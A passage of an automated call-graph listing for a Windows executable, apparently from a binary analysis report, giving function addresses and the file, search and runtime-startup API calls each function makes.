calls 38884->38885 38885->38884 38886->38873 38887->38869 38889 7ff7139b4aff 38888->38889 38894 7ff7139b4ac3 __vcrt_getptd_noexit 38888->38894 38902 7ff7139b4f3c 15 API calls memcpy_s 38889->38902 38890 7ff7139b4ae6 RtlAllocateHeap 38892 7ff7139b4afd 38890->38892 38890->38894 38892->38883 38893 7ff7139b36c0 new 2 API calls 38893->38894 38894->38889 38894->38890 38894->38893 38896 7ff7139b4a79 RtlFreeHeap 38895->38896 38900 7ff7139b4aa9 __free_lconv_num 38895->38900 38897 7ff7139b4a94 38896->38897 38896->38900 38903 7ff7139b4f3c 15 API calls memcpy_s 38897->38903 38899 7ff7139b4a99 GetLastError 38899->38900 38900->38883 38901->38883 38902->38892 38903->38899 38904 7ff713953b53 38905 7ff713953b64 38904->38905 38955 7ff713971e80 38905->38955 38906 7ff713953c09 38967 7ff7139723f0 38906->38967 38907 7ff713953bb6 38907->38906 38909 7ff713953c18 38907->38909 38910 7ff713953c01 38907->38910 38977 7ff713958050 157 API calls 38909->38977 38972 7ff713971c24 38910->38972 38913 7ff713953c3d 38978 7ff713958010 13 API calls 38913->38978 38914 7ff713953ccc 38936 7ff713953c90 38914->38936 38985 7ff713972414 61 API calls 38914->38985 38917 7ff713953c45 38920 7ff713953c54 38917->38920 38979 7ff71396cba8 75 API calls 38917->38979 38919 7ff713953cf9 38986 7ff713971998 138 API calls 38919->38986 38980 7ff71395a9d4 186 API calls wcschr 38920->38980 38924 7ff713953c5c 38981 7ff7139593ac 8 API calls 38924->38981 38925 7ff713953d10 38987 7ff7139718ac 38925->38987 38928 7ff713953c66 38930 7ff713953c77 38928->38930 38982 7ff71396ca40 61 API calls _CxxThrowException 38928->38982 38983 7ff713958090 8 API calls 38930->38983 38933 7ff713953c7f 38933->38936 38984 7ff71396ca40 61 API calls _CxxThrowException 38933->38984 38994 7ff71399d400 48 API calls 38936->38994 38956 7ff713971e95 setbuf 38955->38956 38957 7ff713971ecb CreateFileW 38956->38957 38958 7ff713971fb8 38957->38958 38959 7ff713971f59 GetLastError 38957->38959 38960 7ff713971ff7 38958->38960 38962 7ff713971fd9 SetFileTime 38958->38962 38995 7ff713984534 38959->38995 38965 7ff7139aa610 _handle_error 8 API calls 38960->38965 38962->38960 38964 7ff713971f78 CreateFileW GetLastError 38964->38958 38966 7ff71397203a 38965->38966 38966->38907 39010 7ff7139724e8 38967->39010 38970 7ff71397240e 38970->38914 38973 7ff713971c3b 38972->38973 38974 7ff713971c37 38972->38974 38973->38974 38975 7ff713971c5d 38973->38975 38974->38906 39027 7ff713972d6c 12 API calls 2 library calls 38975->39027 38977->38913 38978->38917 38980->38924 38981->38928 38982->38930 38983->38933 38984->38936 38985->38919 38986->38925 38988 7ff7139718ca 38987->38988 38989 7ff7139718db 38987->38989 38988->38989 38990 7ff7139718de 38988->38990 38991 7ff7139718d6 38988->38991 38989->38936 39028 7ff713971930 38990->39028 38992 7ff713971c24 12 API calls 38991->38992 38992->38989 38996 7ff713984549 setbuf 38995->38996 39006 7ff7139845a2 38996->39006 39007 7ff71398472c CharUpperW 38996->39007 38998 7ff7139aa610 _handle_error 8 API calls 39000 7ff713971f74 38998->39000 38999 7ff713984579 39008 7ff713984760 CharUpperW 38999->39008 39000->38958 39000->38964 39002 7ff713984592 39003 7ff71398459a 39002->39003 39004 7ff713984629 GetCurrentDirectoryW 39002->39004 39009 7ff71398472c CharUpperW 39003->39009 39004->39006 39006->38998 39007->38999 39008->39002 39009->39006 39016 7ff713971af0 39010->39016 39014 7ff7139723f9 39014->38970 39015 7ff71396ca40 61 API calls _CxxThrowException 39014->39015 39015->38970 39017 7ff713971b01 setbuf 39016->39017 39018 7ff713971b6f CreateFileW 39017->39018 39019 7ff713971b68 39017->39019 39018->39019 39020 7ff713971be1 39019->39020 39021 7ff713984534 10 API calls 39019->39021 39023 7ff7139aa610 _handle_error 8 API calls 39020->39023 39022 7ff713971bb3 39021->39022 39022->39020 39024 7ff713971bb7 CreateFileW 39022->39024 39025 7ff713971c14 39023->39025 39024->39020 39025->39014 39026 7ff71396ca08 10 API calls 39025->39026 39026->39014 39027->38974 39029 7ff713971964 39028->39029 39031 7ff71397194c 39028->39031 39030 7ff713971988 39029->39030 39034 7ff71396c9d0 10 API calls 39029->39034 39030->38989 39031->39029 39032 7ff713971958 CloseHandle 39031->39032 39032->39029 39034->39030 39035 7ff713951884 39167 7ff7139834e4 39035->39167 39038 7ff7139834e4 CompareStringW 39040 7ff7139518a6 39038->39040 39039 7ff713951926 39041 7ff71395195b 39039->39041 39231 7ff713983f98 63 API calls 2 library calls 39039->39231 39042 7ff7139834e4 CompareStringW 39040->39042 39047 7ff7139518b9 39040->39047 39048 7ff713951970 39041->39048 39232 7ff713972ed8 100 API calls 3 library calls 39041->39232 39042->39047 39046 7ff713951915 39230 7ff71396ca40 61 API calls _CxxThrowException 39046->39230 39047->39039 39229 7ff713951168 8 API calls 2 library calls 39047->39229 39050 7ff7139519b8 39048->39050 39233 7ff7139949f4 48 API calls 39048->39233 39171 7ff713955450 39050->39171 39052 7ff7139519b0 39234 7ff713968444 54 API calls fflush 39052->39234 39058 7ff7139572c4 76 API calls 39065 7ff713951a12 39058->39065 39059 7ff713951b04 39209 7ff713966c94 39059->39209 39060 7ff713951ae6 39205 7ff713957514 39060->39205 39063 7ff713951af2 39064 7ff713957514 72 API calls 39063->39064 39066 7ff713951aff 39064->39066 39065->39059 39065->39060 39067 7ff7139aa610 _handle_error 8 API calls 39066->39067 39068 7ff713952f97 39067->39068 39069 7ff713951b13 39225 7ff713957148 39069->39225 39071 7ff713951c71 39072 7ff713951ca7 39071->39072 39073 7ff7139563e8 8 API calls 39071->39073 39074 7ff713951ce4 39072->39074 39075 7ff713951cd5 39072->39075 39076 7ff713951c91 39073->39076 39079 7ff7139aa444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39074->39079 39078 7ff7139aa444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39075->39078 39077 7ff7139549b8 99 API calls 39076->39077 39080 7ff713951c9d 39077->39080 39082 7ff713951cee 39078->39082 39079->39082 39081 7ff7139563e8 8 API calls 39080->39081 39081->39072 39083 7ff713951d50 39082->39083 39085 7ff71399de30 72 API calls 39082->39085 39084 7ff7139aa444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39083->39084 39086 7ff713951d62 39084->39086 39085->39083 39087 7ff71399dbd0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39086->39087 39088 7ff713951d7b 39086->39088 39087->39088 39089 7ff7139a2bcc 66 API calls 39088->39089 39090 7ff713951dba 39089->39090 39163 7ff71397ae10 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39090->39163 39091 7ff713951e1c 39093 7ff7139510c0 8 API calls 39091->39093 39095 7ff713951e5d 39091->39095 39092 7ff713951dde std::bad_alloc::bad_alloc 39092->39091 39094 7ff7139aba34 _CxxThrowException RtlPcToFileHeader RaiseException 39092->39094 39093->39095 39094->39091 39096 7ff71395a410 159 API calls 39095->39096 39161 7ff713951ef4 39095->39161 39096->39161 39097 7ff713952d0c 39099 7ff71399de30 72 API calls 39097->39099 39104 7ff713952d21 39097->39104 39098 7ff713952ccc 39098->39097 39162 7ff713978c80 72 API calls 39098->39162 39099->39104 39100 7ff713976688 48 API calls 39100->39161 39101 7ff713952d86 39105 7ff7139949f4 48 API calls 39101->39105 39141 7ff713952dd0 39101->39141 39102 7ff713955e70 169 API calls 39160 7ff713952005 39102->39160 39103 7ff713968444 54 API calls 39103->39160 39104->39101 39108 7ff7139949f4 48 API calls 39104->39108 39110 7ff713952d9e 39105->39110 39106 7ff71395a504 208 API calls 39106->39141 39107 7ff7139580e4 192 API calls 39107->39141 39112 7ff713952d6c 39108->39112 39109 7ff713955928 237 API calls 39109->39160 39113 7ff713968444 54 API calls 39110->39113 39111 7ff713977c7c 127 API calls 39111->39141 39114 7ff7139949f4 48 API calls 39112->39114 39115 7ff713952da6 39113->39115 39119 7ff713952d79 39114->39119 39123 7ff713971c24 12 API calls 39115->39123 39116 7ff71396e21c 63 API calls 39116->39160 39117 7ff713951168 8 API calls 39117->39141 39118 7ff71395b540 147 API calls 39118->39161 39121 7ff713968444 54 API calls 39119->39121 39120 7ff71395e6c8 157 API calls 39120->39161 39121->39101 39122 7ff71395a410 159 API calls 39122->39161 39123->39141 39124 7ff71395a4d0 12 API calls 39124->39161 39125 7ff7139765b4 48 API calls 39125->39161 39126 7ff713971998 138 API calls 39126->39161 39127 7ff71399ae50 71 API calls 39131 7ff713952e39 39127->39131 39128 7ff713974554 16 API calls 39128->39161 39129 7ff7139533b4 64 API calls 39129->39141 39130 7ff713955db4 46 API calls 39130->39161 39131->39127 39132 7ff71396ca40 61 API calls 39131->39132 39131->39141 39132->39141 39133 7ff713956188 231 API calls 39133->39141 39134 7ff713953f74 138 API calls 39134->39141 39135 7ff71395b540 147 API calls 39135->39160 39136 7ff713977c7c 127 API calls 39136->39161 39137 7ff713971930 11 API calls 39137->39161 39138 7ff71398ba9c 195 API calls 39138->39141 39139 7ff7139949f4 48 API calls 39139->39141 39140 7ff713955004 49 API calls 39140->39161 39141->39106 39141->39107 39141->39111 39141->39117 39141->39129 39141->39131 39141->39133 39141->39134 39141->39138 39141->39139 39143 7ff713968444 54 API calls 39141->39143 39142 7ff713971e80 15 API calls 39142->39161 39143->39141 39144 7ff713951168 8 API calls 39144->39161 39145 7ff71395571c 12 API calls 39145->39161 39146 7ff71399d48c 58 API calls 39146->39161 39147 7ff713955e70 169 API calls 39147->39161 39148 7ff71399c0a8 10 API calls 39148->39161 39149 7ff713969be0 14 API calls 39149->39161 39150 7ff713976378 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39150->39161 39151 7ff7139897f0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 39151->39161 39152 7ff71396cbd0 75 API calls 39152->39161 39153 7ff7139718ac 15 API calls 39153->39161 39154 7ff713975c0c 237 API calls 39154->39161 39155 7ff713975d40 237 API calls 39155->39161 39156 7ff71399b6d0 73 API calls 39156->39160 39157 7ff713956114 216 API calls 39157->39161 39158 7ff7139949f4 48 API calls 39158->39160 39159 7ff713975708 237 API calls 39159->39161 39160->39102 39160->39103 39160->39109 39160->39116 39160->39135 39160->39156 39160->39158 39160->39161 39161->39098 39161->39100 39161->39118 39161->39120 39161->39122 39161->39124 39161->39125 39161->39126 39161->39128 39161->39130 39161->39136 39161->39137 39161->39140 39161->39142 39161->39144 39161->39145 39161->39146 39161->39147 39161->39148 39161->39149 39161->39150 39161->39151 39161->39152 39161->39153 39161->39154 39161->39155 39161->39157 39161->39159 39161->39160 39164 7ff71397a250 237 API calls 39161->39164 39165 7ff713960d60 237 API calls 39161->39165 39166 7ff71397aae0 237 API calls 39161->39166 39162->39097 39163->39092 39164->39161 39165->39160 39166->39160 39168 7ff7139834f6 39167->39168 39169 7ff713951893 39168->39169 39235 7ff71399dac0 CompareStringW 39168->39235 39169->39038 39169->39047 39172 7ff71395546f setbuf 39171->39172 39174 7ff71395554a memcpy_s 39172->39174 39189 7ff713955588 memcpy_s 39172->39189 39176 7ff71399c0a8 10 API calls 39174->39176 39175 7ff713955583 39265 7ff713956eb8 39175->39265 39178 7ff713955576 39176->39178 39180 7ff71395681c 54 API calls 39178->39180 39180->39175 39181 7ff7139556e9 39272 7ff713996f68 39181->39272 39183 7ff7139556f6 39184 7ff7139aa610 _handle_error 8 API calls 39183->39184 39185 7ff7139519df 39184->39185 39191 7ff7139572c4 39185->39191 39189->39175 39236 7ff713953210 39189->39236 39242 7ff713967088 39189->39242 39246 7ff71395681c 39189->39246 39257 7ff713997a24 39189->39257 39276 7ff71395571c 39189->39276 39284 7ff713964380 14 API calls 39189->39284 39192 7ff7139572eb 39191->39192 39388 7ff7139688dc 39192->39388 39194 7ff713957302 39392 7ff71398915c 39194->39392 39196 7ff71395730f 39404 7ff713987044 39196->39404 39199 7ff7139aa444 new 4 API calls 39200 7ff7139573e3 39199->39200 39201 7ff7139573f5 memcpy_s 39200->39201 39409 7ff71397894c 39200->39409 39203 7ff713969be0 14 API calls 39201->39203 39204 7ff713951a01 39203->39204 39204->39058 39206 7ff713957539 39205->39206 39435 7ff71398922c 39206->39435 39210 7ff713966cbc 39209->39210 39211 7ff713966d45 39209->39211 39216 7ff713966cd9 39210->39216 39449 7ff713989f78 8 API calls 2 library calls 39210->39449 39212 7ff713966d83 39211->39212 39213 7ff713966d69 39211->39213 39454 7ff713989f78 8 API calls 2 library calls 39211->39454 39212->39069 39213->39212 39455 7ff713989f78 8 API calls 2 library calls 39213->39455 39215 7ff713966cf3 39219 7ff713966d0d 39215->39219 39451 7ff713989f78 8 API calls 2 library calls 39215->39451 39216->39215 39450 7ff713989f78 8 API calls 2 library calls 39216->39450 39222 7ff713966d2b 39219->39222 39452 7ff713989f78 8 API calls 2 library calls 39219->39452 39222->39212 39453 7ff713989f78 8 API calls 2 library calls 39222->39453 39226 7ff713957167 39225->39226 39227 7ff713957162 39225->39227 39456 7ff713956c64 130 API calls _handle_error 39227->39456 39229->39046 39230->39039 39231->39041 39232->39048 39233->39052 39234->39050 39235->39169 39237 7ff713953231 39236->39237 39241 7ff7139532e9 39236->39241 39237->39241 39285 7ff713964380 14 API calls 39237->39285 39239 7ff71395329c 39239->39241 39286 7ff713972a20 22 API calls 2 library calls 39239->39286 39241->39189 39243 7ff7139670a4 39242->39243 39244 7ff7139670c5 39243->39244 39287 7ff713978558 10 API calls 2 library calls 39243->39287 39244->39189 39288 7ff713956714 39246->39288 39248 7ff713956853 39248->39189 39249 7ff713956836 39249->39248 39299 7ff7139b48c0 39249->39299 39252 7ff7139568a9 std::bad_alloc::bad_alloc 39307 7ff7139aba34 RtlPcToFileHeader RaiseException 39252->39307 39254 7ff7139568c4 39308 7ff713957188 12 API calls 39254->39308 39256 7ff7139568eb 39256->39189 39262 7ff713997a59 39257->39262 39263 7ff713997a4f 39257->39263 39258 7ff713997a7c 39347 7ff71399b6d0 73 API calls _Init_thread_footer 39258->39347 39261 7ff713997b1c 60 API calls 39261->39262 39262->39258 39262->39261 39262->39263 39315 7ff7139971fc 39262->39315 39348 7ff7139641b0 14 API calls 2 library calls 39262->39348 39263->39189 39266 7ff713956ee6 39265->39266 39271 7ff713956f5c 39265->39271 39381 7ff713999f64 8 API calls memcpy_s 39266->39381 39268 7ff713956efb 39269 7ff713956f2f 39268->39269 39268->39271 39269->39268 39382 7ff713957188 12 API calls 39269->39382 39271->39181 39273 7ff713996fb4 39272->39273 39275 7ff713996f8a 39272->39275 39274 7ff713974538 FindClose 39274->39275 39275->39273 39275->39274 39277 7ff713955742 39276->39277 39281 7ff71395575d 39276->39281 39277->39281 39387 7ff713983520 12 API calls 2 library calls 39277->39387 39383 7ff713983610 39281->39383 39282 7ff7139557fc 39282->39189 39283 7ff7139848bc 8 API calls 39283->39282 39284->39189 39285->39239 39286->39241 39287->39243 39289 7ff7139567a7 memcpy_s 39288->39289 39290 7ff713956738 39288->39290 39289->39249 39291 7ff713956765 39290->39291 39309 7ff71396ca6c 48 API calls 3 library calls 39290->39309 39295 7ff7139567e1 39291->39295 39296 7ff713956786 39291->39296 39293 7ff713956759 39310 7ff71396cb64 8 API calls 39293->39310 39295->39289 39312 7ff71396cb64 8 API calls 39295->39312 39296->39289 39311 7ff71396cb64 8 API calls 39296->39311 39300 7ff7139b48f5 39299->39300 39303 7ff71395684b 39299->39303 39300->39303 39313 7ff7139b7094 31 API calls 2 library calls 39300->39313 39302 7ff7139b4924 39302->39303 39304 7ff7139b492d 39302->39304 39303->39248 39303->39252 39314 7ff7139b4e3c 16 API calls abort 39304->39314 39307->39254 39308->39256 39309->39293 39313->39302 39321 7ff713997217 setbuf 39315->39321 39316 7ff7139973c5 39349 7ff7139745cc 39316->39349 39317 7ff7139aa610 _handle_error 8 API calls 39319 7ff71399776f 39317->39319 39319->39262 39321->39316 39331 7ff71399729c 39321->39331 39341 7ff71399725a 39321->39341 39356 7ff713974554 39321->39356 39322 7ff713997453 39324 7ff713997464 39322->39324 39327 7ff713997476 39322->39327 39364 7ff713997c38 55 API calls 3 library calls 39324->39364 39326 7ff7139976ef 39326->39341 39367 7ff713978558 10 API calls 2 library calls 39326->39367 39343 7ff713997496 39327->39343 39353 7ff713974538 39327->39353 39329 7ff713997471 39329->39327 39333 7ff7139973bb 39331->39333 39335 7ff71399732e 39331->39335 39332 7ff713997342 39332->39326 39332->39341 39344 7ff713997656 39332->39344 39365 7ff713964380 14 API calls 39332->39365 39336 7ff7139aa444 new 4 API calls 39333->39336 39335->39332 39337 7ff71399734a 39335->39337 39336->39316 39338 7ff71399737e 39337->39338 39337->39341 39362 7ff713964380 14 API calls 39337->39362 39338->39341 39363 7ff71396cbd0 75 API calls 39338->39363 39339 7ff713974554 16 API calls 39339->39341 39341->39317 39343->39339 39343->39341 39344->39326 39344->39341 39344->39344 39345 7ff713997723 39344->39345 39366 7ff71395c214 8 API calls 2 library calls 39345->39366 39348->39262 39352 7ff7139745ed 39349->39352 39350 7ff7139746b2 39350->39322 39350->39332 39351 7ff7139746ec 15 API calls 39351->39352 39352->39350 39352->39351 39354 7ff713974549 FindClose 39353->39354 39355 7ff71397454f 39353->39355 39354->39355 39355->39343 39357 7ff713974570 39356->39357 39361 7ff713974574 39357->39361 39368 7ff7139746ec 39357->39368 39360 7ff71397458d FindClose 39360->39361 39361->39331 39362->39338 39363->39341 39364->39329 39365->39344 39366->39341 39367->39341 39369 7ff713974705 setbuf 39368->39369 39370 7ff713974733 FindFirstFileW 39369->39370 39371 7ff7139747a4 FindNextFileW 39369->39371 39372 7ff713974749 39370->39372 39380 7ff71397478b 39370->39380 39373 7ff7139747ae GetLastError 39371->39373 39371->39380 39374 7ff713984534 10 API calls 39372->39374 39373->39380 39375 7ff71397475b 39374->39375 39377 7ff71397477a GetLastError 39375->39377 39378 7ff71397475f FindFirstFileW 39375->39378 39376 7ff7139aa610 _handle_error 8 API calls 39379 7ff713974587 39376->39379 39377->39380 39378->39377 39378->39380 39379->39360 39379->39361 39380->39376 39381->39268 39382->39269 39386 7ff713983626 setbuf wcschr 39383->39386 39384 7ff7139aa610 _handle_error 8 API calls 39385 7ff7139557e1 39384->39385 39385->39282 39385->39283 39386->39384 39387->39281 39389 7ff713968919 39388->39389 39414 7ff713994b14 39389->39414 39391 7ff713968954 memcpy_s 39391->39194 39393 7ff713989199 39392->39393 39394 7ff7139aa480 4 API calls 39393->39394 39395 7ff7139891be 39394->39395 39396 7ff7139aa444 new 4 API calls 39395->39396 39397 7ff7139891cf 39396->39397 39398 7ff7139688dc 8 API calls 39397->39398 39399 7ff7139891e1 39397->39399 39398->39399 39400 7ff7139aa444 new 4 API calls 39399->39400 39401 7ff7139891f7 39400->39401 39402 7ff713989209 39401->39402 39403 7ff7139688dc 8 API calls 39401->39403 39402->39196 39403->39402 39405 7ff7139688dc 8 API calls 39404->39405 39406 7ff713987063 39405->39406 39407 7ff7139872c0 4 API calls 39406->39407 39408 7ff713957325 39407->39408 39408->39199 39408->39201 39419 7ff713997d80 39409->39419 39415 7ff713994b26 39414->39415 39416 7ff713994b2b 39414->39416 39418 7ff713994b38 8 API calls _handle_error 39415->39418 39416->39391 39418->39416 39426 7ff713998094 39419->39426 39422 7ff713978a44 39423 7ff713978a5a memcpy_s 39422->39423 39430 7ff71399bac4 39423->39430 39427 7ff71399809f 39426->39427 39428 7ff713997ec8 68 API calls 39427->39428 39429 7ff71397896e 39428->39429 39429->39422 39433 7ff71399ba70 GetCurrentProcess GetProcessAffinityMask 39430->39433 39434 7ff7139789c5 39433->39434 39434->39201 39437 7ff713989245 39435->39437 39443 7ff713976194 39437->39443 39438 7ff7139892b1 39439 7ff713976194 72 API calls 39438->39439 39440 7ff7139892bd 39439->39440 39441 7ff713976194 72 API calls 39440->39441 39442 7ff7139892c9 39441->39442 39444 7ff7139761b4 39443->39444 39447 7ff7139761cb 39443->39447 39448 7ff71399b850 72 API calls 39444->39448 39447->39438 39449->39216 39450->39215 39451->39219 39452->39222 39453->39211 39454->39213 39455->39212 39456->39226 39457 7ff7139582f0 39458 7ff713958306 39457->39458 39470 7ff71395836f 39457->39470 39459 7ff713958324 39458->39459 39463 7ff713958371 39458->39463 39458->39470 39485 7ff713972414 61 API calls 39459->39485 39461 7ff713958347 39486 7ff713971998 138 API calls 39461->39486 39463->39470 39487 7ff713971998 138 API calls 39463->39487 39465 7ff71395835e 39466 7ff7139718ac 15 API calls 39465->39466 39466->39470 39468 7ff71395b540 147 API calls 39469 7ff71395854f 39468->39469 39471 7ff713958578 39469->39471 39473 7ff71395b540 147 API calls 39469->39473 39480 7ff71395a410 39470->39480 39472 7ff71395b540 147 API calls 39471->39472 39477 7ff71395858f 39472->39477 39473->39471 39474 7ff713958634 39475 7ff7139aa610 _handle_error 8 API calls 39474->39475 39476 7ff713958663 39475->39476 39477->39474 39488 7ff713959628 175 API calls 39477->39488 39489 7ff713987a68 39480->39489 39483 7ff71395853a 39483->39468 39485->39461 39486->39465 39487->39470 39488->39474 39490 7ff713987a8d 39489->39490 39491 7ff71395a434 39489->39491 39492 7ff713987aaf 39490->39492 39502 7ff713987340 157 API calls 39490->39502 39491->39483 39497 7ff7139722e0 39491->39497 39492->39491 39494 7ff7139722e0 12 API calls 39492->39494 39495 7ff713987adf 39494->39495 39496 7ff713972440 12 API calls 39495->39496 39496->39491 39503 7ff7139720b4 39497->39503 39500 7ff713972307 39500->39483 39502->39492 39506 7ff713972130 39503->39506 39507 7ff7139720d0 39503->39507 39504 7ff713972102 SetFilePointer 39505 7ff713972126 GetLastError 39504->39505 39504->39506 39505->39506 39506->39500 39508 7ff71396cd00 10 API calls 39506->39508 39507->39504 39509 7ff713953e71 39510 7ff713953e89 39509->39510 39511 7ff713953e81 39509->39511 39513 7ff713953edd 39510->39513 39514 7ff713953ea3 39510->39514 39511->39510 39520 7ff7139a9a14 49 API calls 39511->39520 39515 7ff7139aa610 _handle_error 8 API calls 39513->39515 39521 7ff71397331c 48 API calls 2 library calls 39514->39521 39517 7ff713953eef 39515->39517 39518 7ff713953eab 39518->39513 39522 7ff7139563e8 8 API calls 2 library calls 39518->39522 39520->39510 39521->39518 39522->39513 39523 7ff7139ab0fc 39542 7ff7139aaa8c 39523->39542 39527 7ff7139ab148 39532 7ff7139ab169 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 39527->39532 39550 7ff7139b472c 39527->39550 39528 7ff7139ab123 __scrt_acquire_startup_lock 39528->39527 39598 7ff7139ab52c 7 API calls memcpy_s 39528->39598 39531 7ff7139ab16d 39532->39531 39533 7ff7139ab1f7 39532->39533 39599 7ff7139b2574 35 API calls __InternalCxxFrameHandler 39532->39599 39554 7ff7139b3fc4 39533->39554 39540 7ff7139ab220 39600 7ff7139aac64 8 API calls 2 library calls 39540->39600 39543 7ff7139aaaae __isa_available_init 39542->39543 39601 7ff7139ae2f8 39543->39601 39546 7ff7139aaab7 39546->39528 39597 7ff7139ab52c 7 API calls memcpy_s 39546->39597 39552 7ff7139b4744 39550->39552 39551 7ff7139b4766 39551->39532 39552->39551 39650 7ff7139ab010 39552->39650 39555 7ff7139ab20c 39554->39555 39556 7ff7139b3fd4 39554->39556 39558 7ff713987e20 39555->39558 39734 7ff7139b3c84 54 API calls 39556->39734 39735 7ff71399b470 GetModuleHandleW 39558->39735 39564 7ff713987e58 SetErrorMode GetModuleHandleW 39565 7ff7139948cc 21 API calls 39564->39565 39566 7ff713987e7d 39565->39566 39567 7ff713993e48 137 API calls 39566->39567 39568 7ff713987e90 39567->39568 39569 7ff713963d3c 126 API calls 39568->39569 39570 7ff713987e9c 39569->39570 39571 7ff7139aa444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39570->39571 39572 7ff713987ead 39571->39572 39573 7ff713987ebf 39572->39573 39574 7ff713963f18 70 API calls 39572->39574 39575 7ff713964d1c 157 API calls 39573->39575 39574->39573 39576 7ff713987ed6 39575->39576 39577 7ff713987eef 39576->39577 39578 7ff713966ad0 154 API calls 39576->39578 39579 7ff713964d1c 157 API calls 39577->39579 39580 7ff713987ee7 39578->39580 39581 7ff713987eff 39579->39581 39582 7ff713964e48 160 API calls 39580->39582 39583 7ff713987f0d 39581->39583 39585 7ff713987f14 39581->39585 39582->39577 39584 7ff71399b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39583->39584 39584->39585 39586 7ff713964888 58 API calls 39585->39586 39587 7ff713987f57 39586->39587 39588 7ff713964fd0 268 API calls 39587->39588 39590 7ff713987f5f 39588->39590 39589 7ff713987f9e 39595 7ff7139ab684 GetModuleHandleW 39589->39595 39590->39589 39591 7ff713987f8c 39590->39591 39592 7ff71399b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39591->39592 39593 7ff713987f93 39592->39593 39593->39589 39594 7ff71399b57c 14 API calls 39593->39594 39594->39589 39596 7ff7139ab698 39595->39596 39596->39540 39597->39528 39598->39527 39599->39533 39600->39531 39602 7ff7139ae301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 39601->39602 39614 7ff7139aeb08 39602->39614 39605 7ff7139aaab3 39605->39546 39609 7ff7139b45e4 39605->39609 39607 7ff7139ae318 39607->39605 39621 7ff7139aeb50 DeleteCriticalSection 39607->39621 39610 7ff7139b9d4c 39609->39610 39611 7ff7139aaac0 39610->39611 39638 7ff7139b66c0 39610->39638 39611->39546 39613 7ff7139ae32c 8 API calls 3 library calls 39611->39613 39613->39546 39616 7ff7139aeb10 39614->39616 39617 7ff7139aeb41 39616->39617 39618 7ff7139ae30b 39616->39618 39622 7ff7139ae678 39616->39622 39627 7ff7139aeb50 DeleteCriticalSection 39617->39627 39618->39605 39620 7ff7139ae8a4 8 API calls 3 library calls 39618->39620 39620->39607 39621->39605 39628 7ff7139ae34c 39622->39628 39625 7ff7139ae6cf InitializeCriticalSectionAndSpinCount 39626 7ff7139ae6bb 39625->39626 39626->39616 39627->39618 39629 7ff7139ae3b2 39628->39629 39631 7ff7139ae3ad 39628->39631 39629->39625 39629->39626 39630 7ff7139ae3e5 LoadLibraryExW 39630->39631 39633 7ff7139ae40b GetLastError 39630->39633 39631->39629 39631->39630 39636 7ff7139ae47a 39631->39636 39637 7ff7139ae458 FreeLibrary 39631->39637 39632 7ff7139ae489 GetProcAddress 39632->39629 39634 7ff7139ae4a1 39632->39634 39633->39631 39635 7ff7139ae416 LoadLibraryExW 39633->39635 39634->39629 39635->39631 39636->39629 39636->39632 39637->39631 39649 7ff7139b6938 EnterCriticalSection 39638->39649 39640 7ff7139b66d0 39641 7ff7139b8050 32 API calls 39640->39641 39642 7ff7139b66d9 39641->39642 39643 7ff7139b66e7 39642->39643 39644 7ff7139b64d0 34 API calls 39642->39644 39645 7ff7139b6998 abort LeaveCriticalSection 39643->39645 39646 7ff7139b66e2 39644->39646 39647 7ff7139b66f3 39645->39647 39648 7ff7139b65bc GetStdHandle GetFileType 39646->39648 39647->39610 39648->39643 39651 7ff7139ab020 pre_c_initialization 39650->39651 39671 7ff7139b2b00 39651->39671 39653 7ff7139ab02c pre_c_initialization 39677 7ff7139aaad8 39653->39677 39655 7ff7139ab045 39656 7ff7139ab0b5 39655->39656 39657 7ff7139ab049 _RTC_Initialize 39655->39657 39713 7ff7139ab52c 7 API calls memcpy_s 39656->39713 39682 7ff7139aace0 39657->39682 39659 7ff7139ab0bf 39714 7ff7139ab52c 7 API calls memcpy_s 39659->39714 39662 7ff7139ab05a pre_c_initialization 39685 7ff7139b3b0c 39662->39685 39663 7ff7139ab0ca __scrt_initialize_default_local_stdio_options 39663->39552 39666 7ff7139ab06a 39712 7ff7139ab7dc RtlInitializeSListHead 39666->39712 39672 7ff7139b2b11 39671->39672 39676 7ff7139b2b19 39672->39676 39715 7ff7139b4f3c 15 API calls memcpy_s 39672->39715 39674 7ff7139b2b28 39716 7ff7139b4e1c 31 API calls _invalid_parameter_noinfo 39674->39716 39676->39653 39678 7ff7139aab96 39677->39678 39681 7ff7139aaaf0 __scrt_initialize_onexit_tables 39677->39681 39717 7ff7139ab52c 7 API calls memcpy_s 39678->39717 39680 7ff7139aaba0 39681->39655 39718 7ff7139aac90 39682->39718 39684 7ff7139aace9 39684->39662 39686 7ff7139b3b40 39685->39686 39687 7ff7139b3b2a 39685->39687 39723 7ff7139b9370 39686->39723 39727 7ff7139b4f3c 15 API calls memcpy_s 39687->39727 39691 7ff7139b3b2f 39728 7ff7139b4e1c 31 API calls _invalid_parameter_noinfo 39691->39728 39692 7ff7139b3b72 39729 7ff7139b38ec 35 API calls pre_c_initialization 39692->39729 39694 7ff7139ab066 39694->39659 39694->39666 39696 7ff7139b3b9c 39730 7ff7139b3aa8 15 API calls 2 library calls 39696->39730 39698 7ff7139b3bb2 39699 7ff7139b3bba 39698->39699 39700 7ff7139b3bcb 39698->39700 39731 7ff7139b4f3c 15 API calls memcpy_s 39699->39731 39732 7ff7139b38ec 35 API calls pre_c_initialization 39700->39732 39703 7ff7139b4a74 __free_lconv_num 15 API calls 39703->39694 39704 7ff7139b3be7 39705 7ff7139b3c30 39704->39705 39706 7ff7139b3c17 39704->39706 39711 7ff7139b3bbf 39704->39711 39709 7ff7139b4a74 __free_lconv_num 15 API calls 39705->39709 39707 7ff7139b4a74 __free_lconv_num 15 API calls 39706->39707 39708 7ff7139b3c20 39707->39708 39710 7ff7139b4a74 __free_lconv_num 15 API calls 39708->39710 39709->39711 39710->39694 39711->39703 39713->39659 39714->39663 39715->39674 39716->39676 39717->39680 39719 7ff7139aacbf 39718->39719 39721 7ff7139aacb5 _onexit 